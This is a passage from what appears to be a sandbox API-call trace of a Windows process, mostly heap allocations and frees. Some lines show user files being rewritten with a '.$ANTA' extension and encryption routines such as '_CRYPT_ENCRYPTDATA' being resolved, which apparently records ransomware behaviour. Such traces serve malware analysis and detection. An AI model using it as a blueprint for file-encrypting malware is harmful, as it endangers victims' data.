Flags=0x0, Size=0x4) returned 0x43e2710 [0078.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\7qjqvmk.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.841] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0078.841] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0078.841] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0078.841] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0078.846] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0078.846] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x740a, lpOverlapped=0x0) returned 1 [0078.847] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0078.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x740a) returned 0x48f0048 [0078.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x740a) returned 0x48f7460 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.851] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x740a) returned 0x48f0048 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.852] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0078.852] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0078.852] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0078.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x740a) returned 0x48f0048 [0078.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x740a) returned 0x48fe878 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.854] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0078.854] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0078.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.855] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0078.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0078.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.855] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0078.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.856] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.857] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0078.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0078.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.858] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 